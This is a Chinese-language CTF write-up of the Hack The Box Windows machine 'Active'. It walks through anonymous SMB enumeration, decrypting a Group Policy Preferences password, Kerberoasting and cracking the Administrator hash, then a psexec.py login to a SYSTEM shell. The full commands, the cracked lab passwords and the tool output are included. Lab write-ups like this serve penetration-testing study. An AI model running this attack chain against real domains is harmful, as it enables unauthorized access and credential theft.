Please enable Javascript to view the contents

Active 练习记录

 ·  ☕ 2 分钟  ·  ✍️ IceKam · 👀... 阅读

环境介绍:

名称:Active

系统:Windows

信息搜集

获取目标

1
$ nmap -A 10.10.10.100

Active nmap

Active nmap2

  • 系统为Windows Server,端口5388135139445开放,smb匿名`可访问。

shell获取

smb分析

1
$ enum4linux -S 10.10.10.100

Active smb

  • Replication目录。

smb 登录

1
2
3
4
5
6
7
8
$ smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  active.htb     

Active smb Replication

Active smb Replication

Active smb Replication

  • 匿名访问smb,发现一个Groups.xml,下载下来。

解码

Active gpp-decrypt

  • 将下载的Groups.xml打开,发现一个用户svc_tgs,和一段加密的密码。选择使用gpp-decrypt解码。解码后得到密码:GPPstillStandingStrong2k18

flag1

1
$ smbclient -U svc_tgs //10.10.10.100/Users

Active svc_tgs

Active svc_tgs

Active flag1

  • 使用svc_tgs用户通过smb登录后获取到flag1。

提权

用户hash枚举

Active impacket-GetUserSPNs

  • 使用impacket-GetUserSPNs枚举到用户Administratorhash

密码枚举

Active hash

  • 新建一个ad.txt,将上面的hash保存后运行john解密。解密后密码为:Ticketmaster1968

获得flag

$ psexec.py administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file rlXCVuTq.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service eqLR on 10.10.10.100.....
[*] Starting service eqLR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Active root

  • 通过psexec.py登录系统获取flag。

心得

很不错的windows渗透思路,从单纯的漏洞利用,到更加一点儿的windows渗透。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
从来如此,便对么?